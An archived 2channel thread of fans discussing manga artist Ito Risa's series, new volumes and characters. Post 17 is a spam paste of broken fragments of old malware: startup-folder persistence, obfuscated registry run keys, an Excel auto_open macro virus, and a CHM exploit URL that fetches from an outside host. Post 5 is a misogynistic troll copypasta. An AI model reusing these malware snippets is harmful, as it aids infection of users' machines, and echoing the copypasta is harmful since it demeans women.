5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

連載いっぱい!!伊藤理佐 その5

1 :1:2006/11/16(木) 02:19:53 ID:C47oqb4c0
色々な雑誌で地味ながら ツボをついた漫画を連載している伊藤理佐先生。
先生の漫画についてマターリ語りましょう。

<代表作>

「おいピータン!!」講談社 kiss連載中
「おるちゅばんエビちゅ」双葉社 漫画アクションピザッツ連載中
「ヒゲぴよ」集英社 コーラス連載中

「チューネン娘。」祥伝社
「結婚泥棒」集英社
「モモちん」講談社
「やっちまったよ一戸建て」双葉社
「微熱なバナナ」双葉社双葉文庫

●前スレ
連載いっぱい!!伊藤理佐 その4
http://comic6.2ch.net/test/read.cgi/gcomic/1146006977/

●過去スレは肉ちゃんねるでどうぞ。
http://makimo.to/2ch/
※「伊藤理佐」検索結果
ttp://makimo.to/cgi-bin/search/search.cgi?q=%88%C9%93%A1%97%9D%8D%B2&sf=2&andor=AND&H=&view=table&all=on

2 :1:2006/11/16(木) 02:22:19 ID:???0
<関連サイト>

●双葉社 エビちゅ 公式HP
ttp://www.futabasha.co.jp/ebichu/

●双葉社Webマガジン「女いっぴき猫ふたり」
 (更新は毎月第1・第3木曜日更新の隔週連載)
ttp://www.futabasha.co.jp/web_mag/wm_onna.html

●Dr.北村のJFPAクリニックWebサイト
 「クリクリクリニック」不定期連載
ttp://www.jfpa-clinic.org/

●大和書房「なまけものダイエット」 (現在休載中)
ttp://www.daiwashobo.co.jp/itorisa/essay.html

3 :1:2006/11/16(木) 02:26:20 ID:???0
フリー百科事典『ウィキペディア(Wikipedia)』
による検索結果(作品リスト・関連リンクなど)
ttp://ja.wikipedia.org/wiki/%E4%BC%8A%E8%97%A4%E7%90%86%E4%BD%90

<現在の活動情報>

・kiss「おいピータン!!」    毎月10日・25日発売

・HANAKO「あさって朝子さん」 毎月第2・第4木曜日発売
   (年末年始は合併号・祝祭日の場合は水曜日発売)※WESTにはなし

・週間文春 ひとコマイラスト  毎週木曜日発売

・VOCE「女のはしょり道」   毎月23日発売

・コーラス「ひげピヨ」     毎月28日発売

・オール読物「妙齢おねいさん道」毎月22日発売

・ダヴィンチ特別付録「りさ’ずばー」不定期

・漫画アクション ピザッツ「おるちゅばんエビちゅ」毎月第1・3水曜日

・One more Kiss「おいクロタン!!」発売日は偶数月8日ぐらい?

4 :1:2006/11/16(木) 02:28:09 ID:???0
前スレが落ちてしまっていたので、とりあえず立ててみました。

5 :花と名無しさん:2006/11/16(木) 02:47:18 ID:5GvCrc4e0
【女性の権利】

女性は働きたければ働いて、働きたくなきゃ働かない、辛くなったらやめていい。
そもそも女性に辛い仕事を押し付けないこと。かといって雑用やらせるのもダメ。
それで給与も昇進も平等にね。ただし残業、転勤、深夜当直させたら女性差別だよ。
間接差別禁止規定って知ってるでしょ。なんでも平等にね。髪形と服装は女性の自由だけど。
それからアファーマティブアクションと管理職30%目標もね。産休育休もね。当然給与40%保障で。
主婦と言っても、家事を強制される言われはないし、出産するかどうかは女が決めること。
でも産まれたら育児を女性に押し付けないでね。二人の子供なんだから当然でしょ。
ただし離婚したら親権は母親のものだよ。育児は女性のほうが向いてるんだし。

それから働く夫を妻が支えるなんて時代遅れの女性差別。
これからは働く妻を夫が支えなきゃ。
あ、もちろん収入は夫の方が多くて当然だけどね。妻には扶養請求権だってあるんだから。
それと夫は妻に優しくね。妻が望まないセックスは家庭内レイプだよ。
夫が妻のセックスの求めに応じないと離婚事由になるけどね。
離婚したら慰謝料とか財産分与とかまあ当然だけど。
女性はか弱いから母子手当ても生活保護も税金控除も当然だよね。足りないぐらい。

それと女性に女らしさを押し付けないでよ。
そんなの窮屈で面倒だし、いまさら男尊女卑ですかって感じ。
でも男はやっぱ男らしくないとね。
いつになったらレディーファースト覚えるの?ワリカンなんてありえないし。
少子化だって男のせいでしょ。男がだらしないから女性が結婚できないんだよ。
え?レディースデー?あれはいいの。
別に私たちが頼んだ訳じゃないし。店が勝手にやってるんでしょ。


6 :花と名無しさん:2006/11/16(木) 03:54:11 ID:???O
通りすがりに携帯から失礼します。

ガイシュツだったら申し訳ないですが
前にりさずばーで出てきた、酔っ払って
焼鳥屋を追い出されたのって星さん夫妻のこと?

ちょっと気になったもので…

7 :花と名無しさん:2006/11/16(木) 06:34:22 ID:???0
>1さん乙!

>6
りさずばーは読んでいないのですが、
星さん夫婦と酔っ払って焼き鳥屋を出入り禁止になった、とは
「やっちまったよ…」にかいてたね。
多分他にも出入り禁止があると思う。

8 :花と名無しさん:2006/11/16(木) 16:25:20 ID:???0
>>1

9 :花と名無しさん:2006/11/16(木) 19:33:21 ID:1GKyqCRI0
僕の伊藤遍歴
「おるちゅばんエビちゅ」で衝撃の出会い。
長年の潜伏期間を経て
「一戸建て!」で(ある意味)衝撃の再会。
なにしろエロから実用書へ、だもんね。


10 :花と名無しさん:2006/11/16(木) 22:08:15 ID:???O
>1
乙〜!

11 :花と名無しさん:2006/11/16(木) 23:29:44 ID:???0
伊藤先生の漫画って 少女漫画 なのか?

12 :花と名無しさん:2006/11/17(金) 01:06:18 ID:???0
ピータンがキスに載ってるから、たぶん

13 :花と名無しさん:2006/11/17(金) 07:30:35 ID:???0
いや、「少女」漫画なのかと言いたいのだろうて。

14 :花と名無しさん:2006/11/17(金) 12:43:58 ID:???0
エビちゅは少女漫画じゃないな

15 :花と名無しさん:2006/11/17(金) 22:54:14 ID:Y4QPx13wO
エビちゅ、ずっとオスだと思ってた

16 :花と名無しさん:2006/11/17(金) 23:44:00 ID:???O
イッたフリしてあえぎ声
感じたフリしてよがり声


エビちゅマン参上!

アニメもやってたよね。
いくら衛星でもま○ことか言ってるのにびびったw

17 :<body onload=window()>:2006/11/19(日) 00:53:18 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

18 :花と名無しさん:2006/11/22(水) 19:10:05 ID:ADXt+mIK0
ほすあげ

19 :花と名無しさん:2006/11/22(水) 20:48:49 ID:???O
えびちゅが好きなんだけどあんまり人に言えない。
ホントおもしろいのにね。全巻持ってる。

20 :花と名無しさん:2006/11/23(木) 21:43:23 ID:???0
正直、ギャグにキレがなくなった
エッセイ漫画ばかりだから仕方ないのかもしれないけど

21 :花と名無しさん:2006/11/23(木) 23:55:44 ID:???O
Hanakoの朝子さん妙に感心。
体重計の2でそんなことが発覚か…。

22 :花と名無しさん:2006/11/24(金) 00:36:43 ID:???0
ウィルスコード貼られたら人がさっぱり来なくなったね

23 :花と名無しさん:2006/11/26(日) 12:49:01 ID:+TksUAc60
1月にピータン9巻発売!
うれし〜

24 :花と名無しさん:2006/11/26(日) 16:53:27 ID:???0
サンクス。連載読んでないから楽しみ

25 :花と名無しさん:2006/11/27(月) 13:34:10 ID:???0
湯のみ話いいね

26 :花と名無しさん:2006/11/27(月) 14:19:29 ID:???0
うん

27 :花と名無しさん:2006/11/27(月) 15:50:32 ID:???0
しかし、妙に割れない食器ってあるよね・・・。

28 :花と名無しさん:2006/11/27(月) 16:31:51 ID:???0
ありゃ陶器じゃなく磁器なんじゃないの

29 :花と名無しさん:2006/11/27(月) 21:06:44 ID:???0
>>27
山崎春のパン祭りの白い皿とか。

30 :花と名無しさん:2006/11/29(水) 13:49:36 ID:???0
>>29
あいつ、強いよね〜。実家の山崎パン皿なんて何年越しかわかんないよ

31 :花と名無しさん:2006/11/29(水) 13:53:12 ID:???0
なかなか割れないくせに、いったん割れると、割れたところがすごく鋭利なんだよー
あの白い皿

32 :花と名無しさん:2006/11/29(水) 17:07:21 ID:???O
陽子さんみたいな皿だな

33 :花と名無しさん:2006/12/01(金) 12:40:45 ID:03fQOQkI0
おちそうだ〜

34 :花と名無しさん:2006/12/01(金) 13:03:51 ID:???0
決して気に入ってるわけでもないのに
引っ越してもついてくる
家具や食器や服はあるね。
一人暮らしをする時に母に(むりやり)持たされたようなもんとか。

35 :花と名無しさん:2006/12/01(金) 17:01:53 ID:???0
「肉まんが食べたいのにあんまん」って
はらはちぶうとピータンにでてきますね
何かおもいいれがあるんでしょう−か

36 :花と名無しさん:2006/12/01(金) 20:32:07 ID:???0
ただのネタ使い回し

37 :花と名無しさん:2006/12/02(土) 01:24:24 ID:???0
結婚離婚とかの話を「やっちまったよ一戸建て」みたいに書いたエッセイとかってありますか?
やっちまったよの中に修羅場っぷりが似てる、みたいにかかれてたので少しきになった。

38 :花と名無しさん:2006/12/02(土) 10:39:44 ID:???0
>>37
ありません。
その件はほとんど書いてないんで、まぁ色々あったんだろうなと。
書く気もないんじゃないでしょうか?

39 :花と名無しさん:2006/12/06(水) 16:33:52 ID:???0
ほしゅでちゅ

40 :花と名無しさん:2006/12/06(水) 23:45:07 ID:???0
ピータン1月12日発売だね。
よりぬきってのは全巻持ってる人は意味ないよね。

41 :花と名無しさん:2006/12/07(木) 09:07:01 ID:???0
よりぬき?

42 :花と名無しさん:2006/12/07(木) 09:16:10 ID:???0
わー1月発売か〜。コミクスでしか読まないから待ちわびたよ・・。

43 :花と名無しさん:2006/12/07(木) 17:25:40 ID:???0
おんなの窓 と 妙齢おねいさん道 が一緒に単行本になるみたいだね

うれしー

44 :花と名無しさん:2006/12/07(木) 17:35:55 ID:???0
それはいいにゅうすだ

45 :43:2006/12/07(木) 17:46:59 ID:???0
すんません ソース貼り忘れました

ttp://www.7andy.jp/books/detail?accd=R0228174

46 :花と名無しさん:2006/12/08(金) 23:58:48 ID:???0
>>45
ありがと〜
さっそく予約しちゃったよ

47 :花と名無しさん:2006/12/10(日) 23:45:14 ID:???O
今回のピータンのカップルって既出の人達だっけ?焼き芋カップル?

48 :花と名無しさん:2006/12/11(月) 13:34:55 ID:cMK452IO0
ヒゲぴよ、えびちゅも1月発売だね〜。
来月は理佐タン漬けだぁ〜。

49 :花と名無しさん:2006/12/11(月) 20:32:14 ID:???0
ひげピヨはあんまり好きじゃない。。。

50 :花と名無しさん:2006/12/12(火) 10:00:20 ID:???0
ひげピヨは読むたびに限界を感じる
ネタとしてあまり広がりも期待できないし・・・

ひげピヨを切りがよいとこで終わりにして、
他の作品に傾注して欲しい

51 :花と名無しさん:2006/12/12(火) 10:29:02 ID:???0
>>47
焼き芋カップルはもっと若い感じだし顔も髪型も違うよ。
それに今回の2人はカップルじゃなくて夫婦なんじゃないかな?
どっちにしろ初出だと思いますよ。

52 :花と名無しさん:2006/12/12(火) 11:28:11 ID:???0
>>51
だってプロポーズ・・・

53 :花と名無しさん:2006/12/12(火) 11:29:30 ID:???0
この作者の漫画って不倫の話し多いよね。
しかも、不倫に結構寛大というか・・・。凄い客観的。

ハチの話は結婚泥棒の話も含めてあんまり好きじゃないなあ。

54 :花と名無しさん:2006/12/13(水) 20:51:22 ID:???O
続き物ならチューネン娘。が好きだ。ぜひドラマ化しとてほしい。

ピータン昔話デブガリカップルが主役じゃなくてもどこかのコマで大森渡辺いたけど最近いないのも多いね

55 :花と名無しさん:2006/12/14(木) 12:01:10 ID:???0
>ピータン昔話デブガリカップル
って大森さんと渡辺さんのことかな。
なんか…変な表現だね…。

56 :花と名無しさん:2006/12/14(木) 15:08:32 ID:???O
ごめん。昔話→昔は です。
最初書いてる時大森さんの名前が思い出せなくて見た目で書いた。
途中で思い出したけど面倒くさかったのでそのまま送信した。

57 :花と名無しさん:2006/12/14(木) 16:44:14 ID:???0
これは酷いwww

58 :花と名無しさん:2006/12/14(木) 16:51:22 ID:???0
渡辺さんはガリじゃないお

59 :花と名無しさん:2006/12/14(木) 20:08:56 ID:???0
漫画で見てると大森さんは素敵だが恋人だと大変そうだなー。
料理に凄いこだわりありそう。コーヒーもインスタントとかもってのほかっぽいし。

60 :花と名無しさん:2006/12/14(木) 21:11:56 ID:???0
いいじゃん、それを自分で入れるんだから。
きっと恋人の分も入れてくれる。

61 :花と名無しさん:2006/12/15(金) 10:54:55 ID:???0
>>59
友達の彼氏が大森さん(見た目はあんなじゃないが)タイプだ。
ああいう人は、手際がいいので自分でちゃちゃっと何でもするから
友達は楽だと言っていたよ。自分でするのが好きなので相手に
強要もしないみたいだし。

62 :花と名無しさん:2006/12/15(金) 11:14:59 ID:???0
でも、ちょっとしたこだわりがぶつかったら
絶対に譲らないだろうな
恋人同士ならいいけど、生活となると案外大変そう
自分がぜんっぶ相手に合わせられる自信がないと無理ぽ

63 :花と名無しさん:2006/12/15(金) 11:38:44 ID:???0
こういうことはちゃんとしようよ

64 :花と名無しさん:2006/12/15(金) 13:04:51 ID:???O
虫アクセサリーが流行ってるみたいですね。
あかぴ新聞によると(多分夕刊)。
ちゅーねん娘の7年早いセンスを思い出した。

65 :花と名無しさん:2006/12/16(土) 10:53:06 ID:???0
女いっぴき猫ふたりが更新〜。

66 :花と名無しさん:2006/12/16(土) 19:04:05 ID:???0
ありが10

67 :花と名無しさん:2006/12/16(土) 22:18:52 ID:???0
>>65
いつもありがとん

68 :花と名無しさん:2006/12/22(金) 16:54:46 ID:???0
保守でちゅ

69 :花と名無しさん:2006/12/22(金) 21:32:35 ID:???0
モンブランアイス普通においしそうだった

70 :花と名無しさん:2006/12/25(月) 13:20:33 ID:???0 ?2BP(111)
大森さんの会社、よく、三時しようぜっておやつの時間があるけど普通そんなものなの?
うちの会社は、定時までみっちり仕事してるのでうらやましい・・・。

71 :花と名無しさん:2006/12/27(水) 10:22:58 ID:???0
>>70
うちの会社は3時〜4時くらいにチーム毎で休憩10分とるようになってる。
その10分間は給料がつかない仕組みなんで(昼休み50分+3時休憩10分=1時間休憩)
大抵お茶しにいくよ。お土産のお菓子が配られるのも大抵その時間。

ただ大森さんの会社は社外の喫茶店とかにわざわざお茶しに行ってる雰囲気なんで
10分やそこらでは戻ってこれなさそうだけどどんだけ休憩するんだ、とは思ってた。


72 :71:2006/12/27(水) 10:25:15 ID:???0
あ、お茶しにいくってのは社内の休憩室(自販機あり)にです。
社外の喫茶店にいくなんてのはまずありえない。

73 :花と名無しさん:2006/12/27(水) 11:21:22 ID:???0
>>70
マス系・クリエイティブ系の部署みたいだから
3時休憩はありありだと思う

自分も制作会社勤務だからど修羅場中や締切前以外は
お茶する人あり、勝手にシエスタする人ありだ
どーせ定時でなんか上がれないんだから
30分や1時間気分転換してなにがわるい、つー感覚
それに、ずーっと根詰めてやってると
アイデアが浮かばなくなるから息抜きはどっかで必要なんだ

大森さんとこは部内みんな仲良さげだし
仕切り好きでおいしいものを分かち合うのが好きな
大森さんがいるしで「お茶の時間」が定着したんじゃないかな

74 :花と名無しさん:2006/12/27(水) 18:43:15 ID:???0
豚切りすまんが
この間うすた京介氏が飲み会したメンバーの中にリサタソがいたらしい。
〆切があるって言ってる人に限って泥酔していたそうなんだが
まさかリサタソのことではないよなw
楽しかったそうだ。いずれ、りさずばーのネタになったらうれしい。

75 :花と名無しさん:2006/12/28(木) 17:25:53 ID:???O
伊藤理佐フェアが来月の単行本発売にあわせて
スタートですか。買おうと思うのは、
女の窓とピータン2冊。
えびちゅは未読だけど、
応募券のためなら買っていいかな。

76 : 【大吉】 クロへのお年玉 【1092円】 :2007/01/01(月) 17:40:18 ID:???O
お椀にゆずを塗るのよ
しょっつるも忘れずに

77 :花と名無しさん:2007/01/02(火) 12:42:41 ID:???O
より抜きにはマユ話が全部入っているといいなあ

78 :花と名無しさん:2007/01/02(火) 17:28:35 ID:???0
昔の彼女と飲みいったり仲いいことについて
「昔住んでた町にうまそうなラーメン屋が出来た」とか言われたら凹むよなあ。
しかもラーメン好きの人にそんな事言われたら。
「惜しいことした、気になる、機会があればいってみよう」みたいな感じで。

79 :花と名無しさん:2007/01/03(水) 23:47:48 ID:???0
>78
私もそのエピソードの大森さんの言い草には
納得できないよ。
何ヶ月か前に渡辺さんが陽子さんのことで
泣いた話があったけど、気持よくわかるなって思った。


80 :花と名無しさん:2007/01/06(土) 12:01:16 ID:psJd1tC90




¢







¢







¢





81 :花と名無しさん:2007/01/09(火) 11:32:34 ID:???0
シュークリームとキムチハムの浮気男がなんか嫌だな〜
ぶりっ子計算って思う

82 :花と名無しさん:2007/01/09(火) 14:19:02 ID:???0
おいピータン全巻持ってれば、よりぬきは必要ないよね?

83 :花と名無しさん:2007/01/09(火) 14:45:36 ID:???0
新刊出るんだっけ
なんだっけ

84 :花と名無しさん:2007/01/09(火) 19:28:33 ID:???0
01/11 「おんなの窓」
01/12 「よりぬきピータン」
01/12 「おいピータン9」
01/12 「ヒゲぴよ」
01/12 「おるちゅばんエビちゅ14」

85 :花と名無しさん:2007/01/10(水) 01:26:45 ID:???O
シュークリームの話はなんか凄く好きだな〜
浮気男が好きなわけではないんだけど、全体的な雰囲気が
一万円の肉の人が奥さんで、離婚してからは出てないんだっけ?

86 :花と名無しさん:2007/01/10(水) 02:36:16 ID:???0
シュークリームを使ったあのネタ自体は好きだけど、
しょせん浮気男は浮気男だから、どこの女に出会っても
毎回「俺達は順番間違えた」って言ってそうだ。

87 :花と名無しさん:2007/01/10(水) 02:48:23 ID:???0
シュークリーム男は情けなくて嫌い
あそこでぐじぐじ泣くような男はなーんか信用できない

88 :花と名無しさん:2007/01/10(水) 06:48:39 ID:???0
>>84
ありがとう

89 :花と名無しさん:2007/01/11(木) 00:19:36 ID:???0
一時期、不倫を肯定しているといってもよいような
話が多かったね。確かにストーリーを膨らませやすいから
不倫はネタにしやすいのかもしれないけど、
私もシュークリーム男はキライだ。
「転ぼうが泣こうが、しょせんおまいは浮気男じゃん、
妻ひとり幸せにも出来ないで!」と思ってしまう。

90 :花と名無しさん:2007/01/11(木) 00:57:40 ID:???0
>>89
まず嫌な思いをいっぱいして、奥さんときっちり別れてからシュークリーム買いに歩けよ。
と思った。「不倫カップルの微妙なせつなさ」を描いているのはわかるけどね。

91 :花と名無しさん:2007/01/11(木) 01:07:47 ID:???O
カレー心が1位で凄く嬉しかった。あとヨッシーが入ってたのも。

92 :花と名無しさん:2007/01/11(木) 01:49:35 ID:???O
離婚して一万円拾ったら一万円の肉買うよ!

卵酒とよっしーの話が好きだな
情けなめな男が好き。色男の元彼やソースを取りにいけない男子高生

93 :花と名無しさん:2007/01/11(木) 03:51:24 ID:???0
私も男子高校生(大盛さん似)のエピソードが好きだ。
大盛さんがふたりのタイプの異なる大人の女に囲まれているのを見て、
本人も周囲の悪ガキ共も「大人の男って…」と見直すシーン。
デブで食いしん坊の大盛さんのよさを、ああいうカタチで
再認識して惚れ直した大盛ファンの私。

94 :花と名無しさん:2007/01/11(木) 14:48:46 ID:???0
おんなの窓ゲット。
2巻もでるのね。

95 :花と名無しさん:2007/01/11(木) 21:47:03 ID:???0
2万円くらいプレゼント、
DVDプレイヤーとかよりは断然オススメワインだな。
本当は、しょっつるとか、作中で伊藤理佐オススメ料理とかのほうがいいw

96 :花と名無しさん:2007/01/11(木) 22:37:49 ID:???0
>>85
一万円の肉のひとの元夫は、キムチにハムのひとだと思ってたが違うのかな。

97 :花と名無しさん:2007/01/12(金) 00:39:01 ID:???0
元夫は、手にハム=猫だいすきのカップルの男だよね。
シュークリームのカップルとは違うと思う。

98 :花と名無しさん:2007/01/12(金) 21:58:05 ID:???0
おんなの窓売ってなす_| ̄|○

99 :花と名無しさん:2007/01/12(金) 22:02:46 ID:???0
>98
うちの近所ではコミックエッセイとか女性の本棚とかいうコーナーに平積みだったよ。

100 :花と名無しさん:2007/01/12(金) 22:14:59 ID:???O
セブンでおんなの窓げと。
テーマ別に載せてるのね。

101 :花と名無しさん:2007/01/12(金) 22:50:30 ID:???0
なんかピータン9巻、全体的に大森さんが嫌な感じになってる・・・。
細かたtり、不機嫌になりやすかったり。
渡辺さんいつも気を使ってるなあ・・・。

102 :花と名無しさん:2007/01/12(金) 22:55:27 ID:???0
デブってのはそういうものなんだ

103 :花と名無しさん:2007/01/12(金) 23:02:35 ID:???O
ピータン\571(税別)
おんなの窓\952(税別)

ピータンのが分厚くて安いのね
稿料の差なのかな?

文春で一度読んだネタなのに忘れた頃にまとめやがって
二度楽しんでしまったじゃないか

104 :花と名無しさん:2007/01/12(金) 23:06:46 ID:???0
受賞記念フェアの賞品は何が一番人気なんだろう。
手書きイラスト入りの2万円分図書カード欲しい。

105 :花と名無しさん:2007/01/12(金) 23:08:51 ID:???0
ワインか図書券応募する。

106 :花と名無しさん:2007/01/13(土) 00:57:56 ID:???O
1軒目の街の書店でピータン9巻とより抜きとおんなの窓買えたがひげぴよ見つからず。
3軒目でやっと買えた。駅の中の小さい書店で。


マユ話は良かったが最後の方に冷蔵庫があってちょっとガックリ。

107 :花と名無しさん:2007/01/13(土) 09:50:12 ID:???0
9巻読んだ〜。コミクス派なので読んだことない話ばかりで昨日は幸せですた。
まゆ一家の話は相変わらず好きだ〜というか、まゆパパかなり好き。

108 :花と名無しさん:2007/01/13(土) 11:25:59 ID:???0
うーん、冷蔵庫の話はまわりくどいな・・・。
私は大森さん自体は好きだが、時々あるあのまわりくどさは好きじゃない。
「あ〜」ってすぐ納得させてくれるといいんだが、今回はわかりにくい。
彼女を意味なく不安にさせちゃいかんでしょ(黙り込むとかねぇ)。
それ以外の話は、結構幸せとか感じられたので、惜しい。

109 :花と名無しさん:2007/01/13(土) 14:41:44 ID:???0
冷蔵庫の話は本誌で読んだときにも思ったし
ここでも結構言われてたけど
やっぱ大森さんちっせーなーと思ってしまう…。
陽子さんの呼び方の件にしても渡辺さんは色々我慢してたりするのに
ああいうときに自分が嫌に感じてるとこをすぐ言っちゃうのはどうかなあ。
そこでちゃんと「プロポーズ?」って変換できる渡辺さんだからいいけど
自分だったらブチってなっちゃいそうだ

110 :花と名無しさん:2007/01/13(土) 14:57:47 ID:???0
>109
そういう意味では相性がいいんだろうね>大森さんとナベさん
ヨーコさんは大森さんに未練たらたらだけど、より戻したら戻したできっとまた喧嘩別れで終わると思うw
ヨーコさんが羨ましいのは、仲のいい2人の関係なんだろね

111 :花と名無しさん:2007/01/13(土) 16:54:00 ID:???0
マユんちのオムライスの話で泣いてしまった・・・。
ええ話や・・・。

112 :花と名無しさん:2007/01/13(土) 18:44:26 ID:???0
おんなの窓だけ手に入らなかった。
初めて読んだヒゲぴよが意外に面白かった。
でも、工ビちゅにがっかり。他とネタかぶりすぎ。
メアリーとか、昔の作品のリメイクですかorz
長くなりすぎてマンネリなのも分かるし、他にも連載多すぎて、ネタの使い回しになるんだろうけど、ああなったらもう、終わらせ時だと思う。
工ビちゅ好きだったから、本当に残念。

113 :花と名無しさん:2007/01/13(土) 21:56:23 ID:???0
おんなの窓で初めて手塚賞のときの写真を見た

なんか確かに今まで見た顔と・・・違(ry

114 :花と名無しさん:2007/01/13(土) 22:06:28 ID:???0
今回の巻は、「苦手な店」とか腐った時期当てる当てないの回とか「ああいうの」とか
大森さんこまめにポイント稼いでるからなあ。
渡辺さん絡みじゃなければ良い人なんだけど、最近、渡辺さんが気を使って不満だけどいわないみたいなパターン多いし。

115 :花と名無しさん:2007/01/14(日) 00:08:52 ID:???O
コーラス、ヤングユーとの合併後たまに立ち読みするぐらいだから
ひげぴよが禿の新薬とコミクスよんで初めて知った。

女の窓もかったから図書カードで応募の予定。
あさって朝子さんとVoCEの連載も早く単行本化しないかな。

116 :花と名無しさん:2007/01/14(日) 02:04:13 ID:???0
VoCEの連載は私も望んでる。早くみたい。

117 :花と名無しさん:2007/01/14(日) 16:16:50 ID:???0
9巻買ってきた。
リコンしたお友達って、シーツにアイロンの人?
〜8巻まで人に貸してるから確認できない。

118 :花と名無しさん:2007/01/14(日) 19:04:53 ID:???0
うっすらとネタかぶりぎみ?それとも自分が二度三度(雑誌+コミクスなど)読んでるだけ?

あさって朝子さんには期待。
大森さんは冷蔵庫がどーーーしてもだめ。
おんなの窓はよかった。
ひげぴよは初めて読んだけど、動物系はイマイチ好みじゃないみたいだ。

119 :花と名無しさん:2007/01/14(日) 19:53:33 ID:???0
私と正反対だ
ぴーたんは結構良かった
おんなの窓は、論外。ネタ被り杉。
ひげぴよは、エビちゅが苦手なので購入は二の足を踏んでる…

120 :花と名無しさん:2007/01/14(日) 22:07:03 ID:???O
ヒゲぴよ最高。

121 :花と名無しさん:2007/01/14(日) 22:09:17 ID:???O
渡辺さん家の犬も陽子さん家の犬も
タロウっていうんだね。偶然。
この新刊ラッシュはとにかく嬉しかった!自分にお年玉だ。

122 :花と名無しさん:2007/01/14(日) 23:06:18 ID:???0
amazonでおんなの窓取り扱ってない?

123 :花と名無しさん:2007/01/14(日) 23:14:32 ID:???0
取り扱ってるようだけど

124 :花と名無しさん:2007/01/14(日) 23:59:35 ID:???0
ttp://www.amazon.co.jp/gp/product/4163687807/
ref=wl_it_dp/249-3112976-3665968?ie=UTF8&coliid=
I3UY9MUKKDSBIQ&colid=3VKZLD73UCHT4
今のとこレビュー3件。

125 :花と名無しさん:2007/01/15(月) 00:50:13 ID:???0
マユ怪獣の巣に表札があったのがツボにはまった。
あとマユ怪獣の背びれが何気にハートで可愛かった。

126 :花と名無しさん:2007/01/15(月) 00:59:56 ID:???0
ピータン読んだ。

今回は露骨なネタかぶりはなかったように思うんだけど
起承転結の流れにデジャブ感があった。
「ああいうの」を探す話、徹子のうなぎのぼりと読後感がかぶる。
冷蔵庫の話は大森さんの自分勝手さに腹が立つし、
一番好きな主役二人の話にモヤモヤしながら読むのはつらいなー。

127 :花と名無しさん:2007/01/15(月) 01:34:17 ID:???0
確かに大森さん達に思い入れがあると、
最近の流れは辛いよね
個人的には陽子さんの話が一番好きなので、
まだイケるかなー
あと、名前がはっきりしないけど顔馴染みなキャラの話とか。

128 :花と名無しさん:2007/01/15(月) 01:58:14 ID:???0
ここ最近、個人的に大森さんの『いい人』像が崩れていく話が多いのが残念
冷蔵庫然り、あと風邪ひいてひつまぶしとか食べたがる話や
渡辺さんが同じもの注文してイヤミ?を言う話もあんまり好きじゃない
確かに大森さんに嫌なところのひとつやふたつあるほうが人間味はあるんだけど
どうにも今までの『見かけはこんなだけどカッコイイヤツ』というイメージが強すぎて
ギャップにたまについていけないときがある

でもやっぱり大森・渡辺カップルは大好きだし
マユの結婚も見届けたいので読み続けるけどね

129 :花と名無しさん:2007/01/15(月) 03:21:51 ID:???0
最新Kiss、あんまり面白くなかった。
コンビニ前にたむろしてた若者はDQNそうな身なりだけど、実際になにかされたわけじゃないし。
大森さんが「強そうな単語で威嚇して渡辺さんを守る」っていうのもしょぼいと思った。
表紙だったから期待したのにな。

130 :花と名無しさん:2007/01/15(月) 11:10:46 ID:???0
さすがに量産のつけが回ってきた感があるなあ
5冊いっぺんに出して、内容が被るというのはいかがなものか…
時期をずらせばここまで目立つことはなかったものの。
もっと寡作でいいから、面白いものを読みたいな。

131 :花と名無しさん:2007/01/15(月) 13:53:17 ID:???O
おいクロたん、まとめて読みたい。

132 :花と名無しさん:2007/01/15(月) 15:05:13 ID:???0
よりぬきピータン!
購入迷ってる、、、。

133 :花と名無しさん:2007/01/15(月) 16:38:58 ID:???O
ピータン9巻カバーに箸袋でカニの箸おきの作り方が!

よりぬきはサイズが少し小さいので
バッグに入れて移動中に読むのによし。

134 :花と名無しさん:2007/01/15(月) 16:47:53 ID:???0
でも全巻持ってる人は買わなくていいとオモ
初ピータンの人にはおすすめだよね

135 :花と名無しさん:2007/01/15(月) 18:02:50 ID:???0
おんなの窓、コミックスのコーナーになくて
一般書籍の新刊平積みのところにあった。
書籍扱いなのか?だから高いのか??

136 :花と名無しさん:2007/01/15(月) 20:20:57 ID:???O
ピータン全巻持ってるけどより抜きも買ってしまった。大森はもともとこんな性格だなーって思って読んでたから
そんなでもない。今はマユがいい感じで結婚を迎えてくれればうれしいなあ。

おんなの窓がツボにハマり過ぎなのは性別、違っても同世代だからなのか。

137 :花と名無しさん:2007/01/15(月) 20:24:18 ID:???0
・「区内町御用達」がちょっとさみしい  
・引越し時に適当なやかんをパッと買ってしまう←→柳宗理のやかん
・気候の挨拶が長い商店街のおばさん
・皮膚病の柄が面白い(「一戸建て」からくりかえし)
・「ああいうの」(「うなぎのぼり」「レストランの限定メニュー」)
・住宅街で迷子、迷った末に偶然あったおいしい店でビール(ラーメン)

5冊同時発売で、「複数買ったら応募できるフェア」までして、
このネタかぶりはどうなんだ。既刊のまんがでもなんかアレなのに、
「おんなの窓」と「おいピータン」がとくにかぶりすぎ。

138 :花と名無しさん:2007/01/15(月) 20:50:19 ID:???O
去年出た女いっぴきとの方がネタ被り気になった。おばあちゃんに間違えられた話とかもろにそうだし。

でもだからって別にそれで文句言う気もないけど。

139 :花と名無しさん:2007/01/15(月) 20:52:28 ID:???0
